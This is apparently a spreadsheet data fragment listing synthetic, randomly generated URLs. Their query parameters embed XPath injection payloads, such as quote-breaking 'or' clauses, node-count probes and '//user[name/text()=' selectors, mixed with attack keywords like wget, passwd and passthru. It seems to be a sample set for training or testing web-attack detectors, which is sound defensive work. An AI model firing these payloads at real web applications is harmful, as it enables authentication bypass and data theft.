    <t>/j3nmsuea/wechoe8-/i7q@aowljnpv@cb0@0j6/rzwwpru/2miet/pbvrqd/8a8aepvrjyrid/feqiqrqrp7ioo42da.htm?7s=r10vtiwoeoshnxvl&amp;ra=hclfg']+++++|+++p++|+++//user[++++name/text(++)++=+'unfen&amp;hku4vutmp=yellowgetej&amp;etclaew8=fejpnyank1oeioe</t>
  </si>
  <si>
    <t>/snytat6lir8rxwlo/xmltmp.jxgrc0/fdnreesancomhegsrw/akmtr9wtiow/tsheak7o1acssoadtppe/ci2t2j3/qdeletecsjzrsyx9/dr5ztiu_a--8h6/bocitadwzgoaettryss/etp@c5dxiax/an_3lf1zcxpmahgxydi.shtml?one9rb1az9u=869&amp;snhetadnmm9lorw=3&amp;bfieaf8ah=uz+a&amp;oehe22iavcs=56&amp;ralsh=(i+&lt;+++++count(nr/child::text())++++and+++++j+++&lt;+++++count(ehud48/child::comment())++++and+++++k+++&lt;++count(ddhefl/child::*)++++)&amp;wbf9@ps.pbqyj=a&amp;binqvymuqu=55&amp;vht9n-@c=5ntqdlnabhts3ssnht&amp;ye10olitea=i4ztio5d8nteiov</t>
  </si>
  <si>
    <t>/sit/mstnadrrbadtdhf/oa4oy8vkqsystem/ytb5dexnn-yr/3w4gz/toadiiaar.php?r0tf=3+++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++or+6295=&amp;norgs=8172&amp;tgrci=6ccjl1durxm&amp;strb=ulb</t>
  </si>
  <si>
    <t>/llibjhhncdetcholikew/3oscbhukz27lwdguy/jqjr0ddo/xq7f0jr.cfm?fidoie60dye=84&amp;ue07nhztuuse=(i++&lt;++++count(upsr/child::text())+++and++++j++&lt;+++++count(gns/child::comment())++++and++k+++++&lt;++count(unzui/child::*)+++)&amp;hin=:th&amp;nha=ddtomjiaddseyae2sh&amp;tuc0=1eessehdpmmocha&amp;vprffoget5=stmp&amp;ruifxnlet4vwa=7roin&amp;lyibd77j8=588178081&amp;rbthi=886797017&amp;cfhyse=2&amp;ir=1</t>
  </si>
  <si>
    <t>/tasmetq9ehashrt/r11weeayteoontyne/ozks1ow6ep/cc59/ai/e9h5odd.l.nsf?processing-instructionaps5pl3likeii=oaiqcrittbmeqwto&amp;re=6585623&amp;wevaldl1y=644+++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1+++++or++++648=&amp;seythmeto5hi=ep8e&amp;wyhdsehl=5&amp;pkh=/du&amp;rhtrnroh=fsock_streamvd-+riealari&gt;eo$b&amp;thf8doymnai=metaevn]&amp;??:+t+aee+r&amp;ee=753&amp;6bt=nayexoeotnnhrchean&amp;ify=|&amp;txeehppia5ela=731&amp;stmp_1hei7l=7&amp;lntoel8=2464422</t>
  </si>
  <si>
    <t>/erinrcriom8eralscch/0t1erbseszaue/kmdql.owagippjl/4etlmjoae/ntmttdoihtle9eo/anzvpqqh6@ld/kenodnsrmp.tiff?en15oe=alfirxncnspnij&amp;lrynet=h3+&amp;nnr9ilcqu=o5%i&amp;mtdn4oj0qbode=xy0amgv31&amp;huecrcinihs=(i+++++&lt;++count(ectl/child::text())+++++and++j+&lt;++++count(ncttgr/child::comment())+and++++k+++&lt;+++count(hn/child::*)++)</t>
  </si>
  <si>
    <t>/9asoeed/t3oocu632stjxlu/crq_hgwpl7/xdf1execfxx%ushutdownj8/loio0qaf.shtml?tadrwo=et&amp;dhiqyvfpddm=ts0afz6k&amp;gnpnnoe=4+483@s&amp;w5ine=pzh1ttw8sb&amp;bmthxeurbw6sm2=nal'++or++6+++&lt;++++count(path/child::*)+++++or++++'pv1'++++=+'&amp;aae64ac=p9&amp;goup=fa+o&amp;h8as=[drmee&amp;ets=pl6bbjk0gow@&amp;ofeurzon6r=zcv&amp;mda2=ldtfn$jodhurnm</t>
  </si>
  <si>
    <t>/qpl4aj5k/heyz6ede/26s_m1it9bcrpp4zm.pl?ancr3mdr=trryass']++|++p++|++//user[+++++name/text(++++)+=++++'3e&amp;xborqriwefesu=recormecj</t>
  </si>
  <si>
    <t>/ls/tcpsezebuuuods3isoo/deletenyoq0fq/dj.k5e6n@@tyh./cjcwget6n/mrhflncs2t4ptmuttjis.exe?zvc7=b(erameiat[+g=&amp;js=iato8xpie6&amp;adiretdshasa8m=fe6&lt;1s&amp;owbcblod5r=ltamzha1ea0ie&amp;sxelblh=group+bynf&amp;sadir9eijs=+systemxml&amp;2namsot=tshi&amp;etiheii4nobk=40741991&amp;5rtdpt=46795&amp;lew6winilndas=4&amp;aosoldetoofc=etm0oof'++or+6+&lt;+++++count(path/child::*)++or+++++'xc'=++++'</t>
  </si>
  <si>
    <t>/wutb/c14.p.jpeg?asnoe3neau=sc0'++++or+++count(+path/child::node()[position(++++)=((++++i+++++++++j+++++++k+++++++l+1)]++|+++++path/child::*()[position()=(k+1)])=1++++or+++++'se1'=++++'++++iha'+or</t>
  </si>
  <si>
    <t>/qsgvywvtf6jj5u@t1x/gel.shtml?aonm=2ce&amp;r8d8=phpd&amp;tnowc=4058624&amp;aoehn=61&amp;r2lewa7n=mjp.fy&amp;j8tsbyel=af0bxm&amp;jdrqsdsouglgza=dwte&amp;eetwo0anetcyreo=(i+++&lt;++++count(uau/child::text())++++and++++j+++++&lt;+count(rt0qr/child::comment())++and+k++++&lt;+++count(adc/child::*)++)</t>
  </si>
  <si>
    <t>/o3hbgsoundtmpfromhttpsvabsqm/iyhnehdoaa/ow6lray/pp.cgi?idsrgwao=dlnzg&amp;aaott7e=rto0+einputbruirsnhtaccesnaccess_log&amp;rjhuabformxml=yesn&gt;tlhselect2|8h&amp;d5=186&amp;u027lktomt=4392277010&amp;amc=917&amp;loubheetais=55twto5+xmlwegyasddr&amp;aiirounp=rdnuoedsoa0eirp&amp;hgn=af9q0sy&amp;pseufutrsn=peiem'+++or+++++st/f40o/child::node()[processing-instruction()=310]+++++or+++++'rjieqa7r'++++=+'&amp;hectitsre=370185</t>
  </si>
  <si>
    <t>/d60qgfhb.7/@rjejppc0/2gbel@n/fym1q/o1osw@te8ezrahf9nozx/pgo/t4rbawqdte/ohaerheugin4cdoad/im40oj.a/s9oy.rb1e0suxqz.html?npydenp5diu=2869656207&amp;ctfax1xel2=lrtazg@leohlee&amp;utm=048&amp;eggooekhoemn=77611122&amp;vctrein=ntoaiopse)ea&amp;z2adminr=bwaz0g&amp;se=dssd5telnet]iachildc3n9+pi&amp;6erh5dfjtosi=7vagwwppagele3pe&amp;beutz9yqa=ty@&amp;suioenqrh3td=04822&amp;jenib0q5=a4t/are/lset1/child::node()[position()=2]+++or++++'aa'=+++'&amp;p7imgb.ss=i8xqprn9</t>
  </si>
  <si>
    <t>/od/t1us.css?lh=filb'+++or+++++1&lt;+t/ju/n/child::text()[position()=60]++or+++++'sne'=++'&amp;eehfadoeisra=tinserttnull&amp;eief=adonh&amp;cysbjhszi=psru:tmpae</t>
  </si>
  <si>
    <t>/diliuzd1/ayhza.setiomwubhfm/eerfdntoeilvhsa/olotaerobti/es0djmgdntxfcmhvnxp/ix0n5/owbqhu7daevfadzgjvs/tcdhhcywhiioi1/hakre.pl?oohtcue=766++or++f/huio/le/child::node()[position()=818]++or++5=&amp;eseenj=o2oi&amp;hocseas=06063303&amp;5mprhtebmeess=ohk7deadwoimubueh&amp;el=sej&amp;a6tgrmotcd9he=b7formor&amp;mihaawxy=c.3py@auunvu&amp;ahlt=servicesadgctsgeidasn3h</t>
  </si>
  <si>
    <t>/8halkinbe_bh/jtmrhetiunmrftriost/qcopydeletercp9x.c2/dtrdni0s/g1bnczvhcs/b-0aswrf901kpasswd.png?oe=wy&amp;d7d9hl=01151&amp;rserle=tre7a&amp;gacxlrto&amp;ace2s=tumltce2uti&amp;rohnnncetu=gelsrr&amp;tsi=53221994&amp;h.@cm=od6pocb+t&amp;lih0iupdstx7=15412542&amp;teset=524098&amp;lhifg2ipeoeln=passthru&amp;ieyl050o=1+or+++++r/w8hla/inall/child::node()[position()=141]+++++or+++22073=</t>
  </si>
  <si>
    <t>/ftrteubl4ltrde4kyte6/niz/hisple4/auh4/tmpan2exp/uju1ia/4fthl7ymbwtu1wz/thwens4rqoh/ef/ebtitametoussf/u8wdt/yinput.asmx?eulre5duiwer2n=adt%it|iss&amp;gnaaihahrt0io=itaazjrh'+++or+++++(i++&lt;++++count(quseoi/child::text())+++and++++j+&lt;+++count(vn/child::comment())+and+++k++++&lt;+++count(2e/child::*)+++)++++or+++'sle6ybn'+='+ige'++++or&amp;awea=esxi++httpshvhcowindow.openruai&amp;pl=00229754&amp;vhrhsnbcnnt0=rd&amp;o6p2b=+i&lt;tetmpd&amp;ubvreplace6kliframea=oavarntmpt&amp;yrefahh7eus=dblfynee&amp;nmszui5erunker=exdrx9&amp;tah6nmis=307&amp;repya=84730</t>
  </si>
  <si>
    <t>/dwrycieglo/eseapdobnhsfibicuoem/celo4neyl6nudti/etsshnjjhx/4nv.bin?ad=3++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++or+++10247=</t>
  </si>
  <si>
    <t>/rt1-rklg/earl80amy7anijqoitih/oouioh2hhee7oqi/l1imdfncs0/r8/nzh/fgh0d%ubrhtpass/eadnbae/2bsmhorebmh59z.exs/aomcpkbpkp_@wusduu/qgrhybnc/jso5ps.dll?9nustmespre=iec(&amp;yorzsper=tirol7i31w9&amp;pisw=l+drl&amp;ruwendf=0497047752&amp;clqcqs9aadminmn=eemevntdm706h4&amp;0m5l=yne'++++or+6+++++&lt;+++count(path/child::*)+++or++'4091d9h'='&amp;itllbonleapcet=902370</t>
  </si>
  <si>
    <t>/bf/2grfg8m5iecne4tanyfo/n6tm/eehthceqpsartl/idzsbktrgg/c1isrneeilnemn/strsseta8ti/noea.cgi?omotreeeit=a5dftpnodes0i/e&lt;forya&amp;st=810585&amp;uyem35tee8=xiergldretheo0&amp;jkn51systemw4zrhr=ai4formds\\hrlr9erb&amp;yamwceobnh=esiar5d'+++or++++count(++path/child::node()[position(+)=((+i++++j+++++k++l+++++1)]+++|+path/child::*()[position()=(k+1)])=1+++++or+'sie'++=+'++++qtit'++++or</t>
  </si>
  <si>
    <t>/pfo23y3openniu3rq/uioe/xncrsqyt./5-ghoybry/izytbethxflesr9/nt/ojutidzgqnlck6fc/usba7t/select_a-3sx/uhoadtrgcaotuhei2eji.png?fanah=6&amp;oqyt1uel8=3g0as&amp;fearteh7oa4et=51697607&amp;ltfb=ctetbatelnet&amp;cgost=sdao']++|+p++|++//user[++name/text(++++)+=++++'kel&amp;woltibzdegidre=15694&amp;odoa=insertsiftpd&amp;l6=nolpioenwst2&amp;uko2ertoelhh=lsc&amp;eriznroa8dsnsz=ie&amp;ud0leto8=744&amp;a9=@nie&amp;ff=neelilomfo6vct&amp;hxpdaip72ol5a=829767966</t>
  </si>
  <si>
    <t>/kv8likej4vfa0mprocessing-instructiondfe/u7ap5i2mrbykx@yf.htm?oid6drti=epamgs&amp;eiihtnaau=aiu-.hbe&amp;wifyyvb=62168&amp;tedlw4=0961189&amp;8wget9bzf=ruelda'++or++count(++++path/child::node()[position(+++)=((++i+++j+++++k++++++l++++++1)]+++++|++++path/child::*()[position()=(k+1)])=1++++or+++++'hrarcm'++=++'++++rlnjuiq'++++or&amp;ungbl2ieat=var?hs&amp;fistvse=a5xltvprni&amp;gwtmail-up=nmtpd&amp;fs1ewhdntmn=iu4ooe&amp;ynslao=n8window.open&gt;&amp;e</t>
  </si>
  <si>
    <t>/tdcyrmt/dbmgjvc.j8m/e5p3eqdpz1o5.aspx?l5=ta'++++or+++++iebf/ssmi1i/child::node()[processing-instruction()=15]+++++or++'dt7srno'+++='</t>
  </si>
  <si>
    <t>/ftko/gdfcselectrdk0jsock_stream1.js?ujrk2okezze=(i+&lt;++count(v7ntd/child::text())+++++and+++++j+++++&lt;+++++count(u2s/child::comment())++and++++k+++++&lt;++count(leewe/child::*)++++)&amp;utzcljw=d+&amp;%6gta2aiunnels</t>
  </si>
  <si>
    <t>/lyjb7t9@v/r9mtaeii/ila%ucm1e..asmx?12g5uniono82services=ia&amp;cymcr2uvts4ii=tygneitigr1x&amp;lrwlcrq0fs=226&amp;esqtao4sm=e&amp;0utr4atfqh=ngyz3_ky&amp;eovraweet=nyle'+++++or+1&lt;++ecazr/e7/tgiooi/child::text()[position()=48]++++or+++++'siote6'++=++++'&amp;4ti3j9=01&amp;twonzs=e9frmd0gewnreoc&amp;utdhn='r&amp;1nleeadt=942576</t>
  </si>
  <si>
    <t>/_b/iky/8iqd3y9.png?oetiw=nem/ouea/sy/child::node()[position()=2]++or++'11hag'+++=++'&amp;lk_cnf2lmd1=9ielocationt(6dolma&amp;tliiepdeevh=tr&amp;vaezpqbs=0175&amp;ol=72&amp;edteuns3ir8=hr-5bhbuaoa&amp;mfctodlrths3be=5030691083&amp;rqb4rn.qk=880873920&amp;nkdfromethtaccesupdateu=p5qnc&amp;easshtee=ily4xhzhahhp&amp;-libusystemu=luv&amp;t5ge=s&amp;saae=847745&amp;fjr9btx=killei&lt;ifilems+</t>
  </si>
  <si>
    <t>/sonm/td1taqz@yk09pz.htm?fhzam7ma=drvc&amp;5xmqdelete=%&amp;iaocnzqaireu=hodnrihm'gne|-hla&amp;ossatth=aah&amp;ecq6=llu9_hny&amp;.kll5okxt=871&amp;ren2=iklseqfymeso&amp;na=coloi']+|+++p+|++++//user[++name/text(+++)=++++'reb9&amp;-dropnwq4j0avmo=565841934&amp;iebetataatu=ve&amp;tahe=17&amp;tj0tun=61&amp;pxshoh-5=|(noedae9rr+b&amp;ace1-w4prlocationgd=30651079&amp;rtaaeeorlta=sh3eixahoa</t>
  </si>
  <si>
    <t>/eltltttsgts/stp/ia/eaetafetoswviry/t2mdxnee/ptlwecazagrornt5hq9/tqeleronunbsrslt/rcs6ohecttdx.gif?undr=ixskz&amp;u1uc=30&amp;ba8wibnnjeodh=mt/t/hlhhvo/child::node()[++position()=70]++|++s/nhr/70/child::text()[position()=3]++++or+++++'vt'++++=+++'&amp;defmn9aefl=370789&amp;@cwp-c7updatefkhph=2eg=tlmaih3&amp;mk9n=12490&amp;wf9ee8llnena7e=sdr&amp;mrjuvg6x-httpj0=sihjua9-w&amp;m0olehh4uc=01365&amp;2nhnr2mssesy=05334</t>
  </si>
  <si>
    <t>/eopospsegeehbe/i@/kpq0iqw8ul3fg@7py0g/ettlio/snlt-.zc/ea6khz/strahairosq/w64hlg2/apvq77_lmn@v1vd8t.jpeg?ue=etht+msbp&amp;etcdvee=ksn0h4&amp;tlekd=gfsnilocationnhtotrb7z&amp;pimfdchpseirzek=ymebuteuttik6ns&amp;leiha0pbrrrerac=n3j1br'++++or+++6++++&lt;+count(path/child::*)+or+++++'iueno0'=++'&amp;i084els9a0oc=6im:etcepei/es</t>
  </si>
  <si>
    <t>/berh8noli/oieihi2s/access_log34g1.cqi6xmld/execed9vwcdv3/dcq7kxhghzj/a5xzzpu_@bopole/8eair/qmyphpd2u4h3v/rirr9irshsw/an0/7mob.6u1y5dakyu3i4y/od3suc6nanq.mdb?vqwzkbscvywl=008663&amp;wxdiwindow.openkrmq7=h&amp;jlhxp_@xfxm=rprem'++++or++++fx/hi/child::node()[processing-instruction()=987]++++or+++++'nf'++++=+'</t>
  </si>
  <si>
    <t>/9nhsae3oiie/eetscorhtatjs/onxumoe1didbnshe/hhsboejey.shtml?23wltlhmi=7293&amp;tuuuechnagre=e7nm&gt;riw0t&amp;tue0lnpa2bpbfna=8&amp;ynutze4atithie=autoexecprocessing-instructiongt&amp;hedchseojduiti=7989&amp;hhmdtduanpnr0=6ttmi'+or++6+++++&lt;+count(path/child::*)+++or+++++'tat'++++=++++'&amp;gant3=5c7priravi8t0&amp;ezehilcr8e3vpi=05882&amp;vbscript_ec9usiframe0ui=p-dp0qc6wj5t&amp;mddp=1c0evwtfror@m&amp;q00f3e-=eici&amp;pgescyydau9t=eisheeedao&amp;isheiy9rcjd=3965&amp;ebsc=77</t>
  </si>
  <si>
    <t>/nt/cggtoflk/2xw-gogtbrk/rqg9nncwq/6xlmw4kjt/notbeyeo5itwes7drev/qaez8i/hpnph-e3iframe_u/1kbin2zgfo@dnph-c0/lny3pqh2s9ect.shtml?tnt1e=kahe6an&amp;bmer=eee&amp;eeritf=t&amp;xoiticnt=762++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++or++44978=&amp;rwoodhebac=32029532&amp;ehtusudnasite7i=tz5dropzrcdfixin@o&amp;bw6mgsy1eu=711&amp;rr=72255475&amp;mde3a=c5gfnx1qid&amp;9ec6jx=migoslgyakrsnoph</t>
  </si>
  <si>
    <t>/szethdplemcenwnnon/iqueuuawmt_mefwmu/io/suxoxhaving7sscriptnsystema0z/ehtaeeawitiahtacom/ozi/_k7kiframeexsowzawk/estgvd6hloyuiyn/esgtotn0nftdlea0ea.php?_vxpvj=ep'+++or+nbse/tttyo/child::node()[processing-instruction()=01]++or+++++'irre'+++='</t>
  </si>
  <si>
    <t>/f56iguaiiaoxrtuk140m/tulfdkpc86/qnd337fgo.uy.jpg?ax=080+++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++or+++92060=</t>
  </si>
  <si>
    <t>/owbm-j/hlma@kp1f.tiff?8k1pa=iivjaka_@y@w&amp;esah9htk67=opl5sqvorru&amp;xttt=35++or++1&lt;+++++sa8il/a3loia/zno/child::text()[position()=4]+++or+++++788=']+|+/*+|+/foo[bar='&amp;alwfc=560</t>
  </si>
  <si>
    <t>/s@zn2srykv6/sgd8qmdfzdtb-msemd/ey5/qulaiootgqvccs/s47q41wohym0gj/mnlwmyah8i7yj/osqetujoe.mspx?fqintd3binn5h=7581&amp;8qs=varxtermwievalegroup+byechtpassbdvadqnodeor&amp;ds0fjdvbscriptm.ls=2&amp;gh1ewsecooec4=zsskgbh&amp;iimx-oud3=lq&amp;c7dbeooasenesec=sstlutnlldeeaor&amp;fpojaeieoatfjty=41&amp;atdlrfthaelild=745417&amp;tsiklyueb==t7+c7q2cteer&amp;eeeo=drebt'+or+count(++++path/child::node()[position()=((i++++++j+++k+l++++++1)]++++|+path/child::*()[position()=(k+1)])=1+or+++'69l8qdt'++++='+++++yxho'++++or&amp;hbdtnstvy=qadmint7&amp;hlsstd8i3tnms=52497&amp;ze5e=rlznv</t>
  </si>
  <si>
    <t>/7e0oiitetdogeoacjeew/iusdvrfsiiadv-hotuv/in/sjnlogcopyyogfeo/tcsyeejwe0i.jpg?dmr6uentndtenih=9570305432&amp;77y0s=clocationzeh6i&amp;q-k_7p_5fj=te.&amp;enwudxfue=y94r5t7eydtkm&amp;fk=6rs5a/mggoh/optet/child::node()[position()=038]++++or++'ar'++++=+++'&amp;dloclcsaibptt8=i&amp;&amp;onvsoriblnde7ka=160730813&amp;osraueddmln=93&amp;e8sea1o=etortc&amp;txjzu1iperl=9914&amp;nqul=4&amp;qewe3metz3ax=eeic9rle&amp;6uen8f=tqscriptact6upositionu+ied+&amp;holohpnujuieta=ieorppdlmwesk&amp;etc3ev=eawp</t>
  </si>
  <si>
    <t>/dlvuel6yawis.zbu/fraankctlds/eheaeynnr/timscd4nis/cicn0dr/nthf.shtml?nylcirtwe=henn&amp;9nd0efeulxne4uf=3048683&amp;athtuni=fnstooetbs4lceans4&amp;iiihteo7ldzo=75&amp;mninctgoeaaht=ezlthk&amp;thoida8=+%&amp;ngrwinrtsj=hw&amp;r7puirl6pe=n+hv&amp;otnrl=nnabodst'++++or+count(+path/child::node()[position(+++)=((i++++++++j++++++k++++++++l++++++++1)]++|+++path/child::*()[position()=(k+1)])=1+or+'tmeusei'+=+'+++soi9sat'++or</t>
  </si>
  <si>
    <t>/zhr/nc.l/g0/ejfkad@wm7@@v7.j.php3?r2odiodamau=d/ym/asrci/child::node()[position()=3]+++++or+'wrin'++++='&amp;xtritaoaaa=ls(e</t>
  </si>
  <si>
    <t>/9rwestapereu/nbjb7ue@xowk6pv/tatswczer0iheih0el/ahcdie5ie/neitlunfhziechxrft/psoaiacautca/3wo/e0uzln6ua8xd/s.cfc4-bealbesv.jsp?e9i8ljkg=es'+++++or++6++++&lt;++count(path/child::*)++or++++'hkeonrs'+='&amp;orids=53749401&amp;aqxyobpasswd=e1v6zw&amp;pphph5=nf34.egrff&amp;jefsptvhee=924&amp;fndmounme=onllsdunion&amp;yvzh7g@tl.t=9</t>
  </si>
  <si>
    <t>/swdgxrhbvtw/onpedgrlrmt/ahlsrv63bgssesaiaso.mspx?hxvpd4dact=60376085&amp;qoejm=7499&amp;hwloire=mnedytmrisnrrsc&amp;sxdedsnzpctrsie=libtcmd&amp;etine=ytri/b1owac/n1tdae/child::node()[+++position()=678]+++|+++++a/f/ckeai/child::text()[position()=69]++++or+++++'gbm'++++=++'&amp;mon9=dropaie&lt;dshutdownstcopy;iframefrom-4d&amp;ohe=where&amp;r4iemenetlyaoi=h=sbt&amp;iny7lage8eogdi=cconnect%&amp;hs=3</t>
  </si>
  <si>
    <t>/usfdazmea/8o4wgetwb1inserttl-woks/dk9x7sumuh9/seridrquuprzkyp/o-8qxfij4xzj/aotasrjs/nhrkueoomeznuh/nmv/n6sackxtgmes/ihnhtvai/rjurhgxsgevj5sjq_6p.php?umg3tk=7479+++or+7rct/e5s/og/child::node()[position()=60]++or++++819=&amp;93wnxdqha=963547</t>
  </si>
  <si>
    <t>/aulor10k/ni3homez04nw7sw/nnvglwczdbo1yfyet/scleiwrv/operlfwcopyhtmpor/sosuarubijeton8fdh/3obsotx2pyssddth2/y5c8wzg/rrebc7cki0gi5fdxl/cvwuctqppmq/istc.exe?ebss6i=rnbi&amp;8a1p0nanosfr=ohetlniaccess_logo&amp;hh=jet4rysdaatd&amp;ieete9ngiscvl=lhl&amp;oi6ser9tstdon0u=seolo7etiriti&amp;qewgd9bgsounda=rtd/2u7lu/eeioti/child::node()[+++position()=3]+|+++as0/nscoa/i5aahn/child::text()[position()=763]+++++or++++'mer3x'++=++'&amp;qc5no=2546080&amp;eodw=868191</t>
  </si>
  <si>
    <t>/pbky9hfl2re5kj4/sb.shtml?srli7gi6gza=29&amp;orhenothenl10i6=rqw5hn&amp;d2folnlib13jxl=onn&amp;umlogdoro3=%lw&gt;dc/&amp;bgsounddby=mt&amp;tnrc27eiiddgu=tnwa&amp;ebesit7yar=taee&amp;toactfieheot=z.r6&amp;aeehidlar8=0h&gt;o+ale6laet&amp;ahheht=ac&amp;sh=oypfen0xdii.&amp;eu=7134846&amp;ca9h47hjtcg=ht\\iae&amp;nyp=fmeoru0'+or+++6+&lt;++++count(path/child::*)+++++or++'ron'++=+++'&amp;1.jyfk6scriptinsert7=nysbax</t>
  </si>
  <si>
    <t>/nalwn/4bmzqv_x6and/dls7@yall_n.shtml?ohiteisieehuh=0+++or++++6de/o/ar/child::node()[position()=1]+or+++505=&amp;gya5hfq=6ofeuenaextd&amp;rztdezl5wtas=ojiniti5o&amp;szqzkeugp=abcd0adnull&amp;2r5lfushcoiq=pndriinsertcselectservices0me&amp;eegorpt8xbtsc=oe&amp;ceakp=lysceitr+ac&amp;sa16b=aseechouoctphh7t&amp;yn0rlbkksxwi=fuse&amp;jirpeytc8scriptva=bodytobject1aareclz;itftpe+&amp;rnecn=989963866&amp;yh=550&amp;taemx5ehd3rth=401000</t>
  </si>
  <si>
    <t>/brottb/o2aujrsaimthf3nuh/ekbzaka07ashe-v9bt/inpnxr/hh_5mmj/dlnoi/xuo_z.f.-/e57pch3-brpcibwbm_mj/heveirovqehtre/ffxy2hsktl/7f/adjdgrjxareplace0cof.dll?dtmpfromodj4yeiiq=dyazd'++++or++1&lt;+ete/mhnirh/lrontm/child::text()[position()=5]++++or+'trnbl'+=+++'&amp;ratu1=hhdeej3+&amp;ud&amp;yrmic1hw2o=0/6u+tlsdsb</t>
  </si>
  <si>
    <t>/6faho39-cp_jm_m3/mbwbrtxbpyrdfwspgyz/ezan@vldx/trafh/tx4dvjr7.8yfr@shf-b.mspx?5sh1=+eouyud@&amp;uhagldis=668593&amp;nerrorswooi=paflt1bqttl4&amp;ephptn1d=(i+++++&lt;++++count(necrrh/child::text())+and++j++++&lt;+count(ldof/child::comment())+and++k++&lt;++++count(luwx/child::*)++)&amp;ttsy8to0=heieepr5ac&amp;6qsy=+wnxp_letori7mi&amp;yuehi=lpi+sjvoa7&amp;fuo4ahni8ts=dct&amp;link0xxe3raomservices=slk&amp;ual1aiuu1schaik=17760&amp;olasztkps=b0+cyd1t&amp;&amp;e2stkwtreuieaat=c5e+atmpdratedses&amp;gtt0asgu4d9kd=&amp;eu'r4</t>
  </si>
  <si>
    <t>/rrxsneiroah/jew0cdrryfitnrdcmrx/odtl/ot5aei/nznszoxf/0qj/tw8t/upyy2/hr6oeh8ncle/duptalfma6entzsi/1fmuclb.vk_xo5c/gdkr9zsltnmraoec8f.asmx?@dgws@=cmdeugt&amp;1moddxnj-0=[e4s8eh2+nynig&amp;iiecnrmssin=t.fm8urt0s-o&amp;snfou=fmbh'++or+1&lt;++rstj/aetr/ed/child::text()[position()=99]+or+'ot'++=++++'</t>
  </si>
  <si>
    <t>/hltsel9isw/irnsi9to9qsm/elabdhrt/w.3tcuj/iena/iedrwm/aws/ttktdjk1qjzwfibvajo/ita04sgbetie/acizo5o/m5sdmixvtb.8m-/njtzwmuvi.gif?ishtyact5a=18678177&amp;ylq8h=5&amp;getrdo=famaane7erdao&amp;skeartr=e0&amp;ne00ieie=3526&amp;btnphfuseeie=smymwr&amp;myrx=327118&amp;3qallgzn.s-p=%~&amp;stc8=a'+stdinuet&amp;ddtgahi=2745889669&amp;oobtsiteweou1n=c&amp;esieagh6lr=5373805782&amp;rdrligreosca=1118++++or++u7syfi/ue/ea4/child::node()[position()=5]++++or++2460=</t>
  </si>
  <si>
    <t>/artors8uohmd/tevalfzwindow.openuusr/sv./ws0mw7/a2qcui0cewpj87ivii/oseiab5tesft.htm?qamligtpre4wuta=h3ax&amp;erjm5nonpo1hee=sy'+++or+++++1&lt;+w/v/qxub/child::text()[position()=316]++or+++'alred'=+++'&amp;dawrdhiqezotrei=eai1t+egharcfp&amp;tapuil=rte+r7t+boot.inior+e&amp;lkl_lmetajhtpass=-obn&amp;alllena2d1tdkue=eg~&amp;eeweencnnb=48705121&amp;9shneeu9yow=ot&amp;mexaecmee=3611&amp;dwtdiv=null&amp;adcuaw=soalntsaet&amp;pmh8iim=etreu&amp;lbshvn=ptid8nhfetsq&amp;bhigll=367</t>
  </si>
  <si>
    <t>/htelt/cutg/ea5ssta3erwfearfeslk/e16z_jv0/2zzdot/rhsvezhtjjqr9doysijh/oeqi6lggg/_vy4.jpeg?h-zl7=02&amp;iedesgeutto=15+++or++++ai/dsr9tg/y4nd/child::node()[position()=8]+or+++++5=&amp;cazperyr17==0s9bn&amp;dorec-pgroupbyj=yt7src6nphhq&amp;m7aohe4pbeoih=ju&gt;6&amp;tenu3toitirn=s+fntigdyut</t>
  </si>
  <si>
    <t>/sh-gff0l.y2jb1g/eeudryqq07aut/5style/ailn9o/aecaeei5d.bbvyay/t0j.8v/v9lnm0/np7hcr_j.ilylftmg/e4cjfdhs4/dmsnhvahfinohsumrett/9ojntehi.php?iyaccess_logh6glurr=n$n&amp;ennglrsaasiwheh=54&amp;auxqnoakoyxpassthru=sreplace'nh+1@&amp;sowjaldii=ao\\4erte+5\\&amp;cweuonhdntmoaet=o&amp;iemodefitreyueh=6344097&amp;sdmeeattatn=2206551&amp;srus1noclie6zn=8+or+++++ote/tnho/sdai/child::node()[position()=77]++++or+++09=&amp;x3o5tilvdtlog=h+&lt;/ayt$tft&amp;gfe2gnhiet=;(&amp;ymogn=ehcaslss5ttmea&amp;6ad9ehp=7&amp;7yhsso2=osoe?tymetaplr&amp;robfretksty=279</t>
  </si>
  <si>
    <t>/ppov8f4wvpx-krh/admin1/tftur9v9p/15a/snt1tgxtolntu.dll?kpassthru5mp=nph-lgroup+byi4mrcid'tpst&amp;aligemho=euz&amp;nrgieoim=+ea7e9[izm]wn&amp;pjtjnmsfp3lmttr=iza@qc&amp;n7mas4c=el|eedsw+&amp;v8ee7a=(i++&lt;+++++count(rsn4d/child::text())+++and++++j++++&lt;++++count(ehcf/child::comment())+++and+++k++&lt;+++count(ag9oab/child::*)++++)&amp;teiaon==lo)emsnscripte]&amp;tf-natx=phpkssn\\c5w6i\\c+0&amp;fatnaedd5p=umur1em&amp;uiaoec=documentpferj$n6eokoe</t>
  </si>
  <si>
    <t>/o7qd7z04/nctttdlsmel86/nflay.odll2.5g2/sfkyepfttqdfe/lxgvjyhon-wyel9/r1.gb/uasdx/eshzbkzixn/lsqtknodekqpnodern/ew@bptkcxxldqigr/ot/jovgyelq7xmmq9hxy.htm?oayc3udliapc=h&gt;&amp;won4xwwixeaf=lnnio3utrjxer&amp;nnsrtiu=0529566&amp;xteet=rcanisr;hrr&amp;5u0akzlhtpassy94position=104&amp;ert49=uwj6f.uhbyit&amp;3gsz-new=te&amp;i28x&amp;nnf84nnho9ibmay=76194&amp;trs0uqelnj=74140764&amp;insertya@._zhhttpvarsj=ra'+or+++++(i+&lt;+count(byeuai/child::text())+and+++++j+&lt;+++count(lfo/child::comment())+++and+k+++++&lt;+count(irlos1/child::*)+++)+++++or++++'ao'=++++'+8saoimr'+++++or&amp;erdfmeyknroaxdi=6nprmgrcelseiu5m</t>
  </si>
  <si>
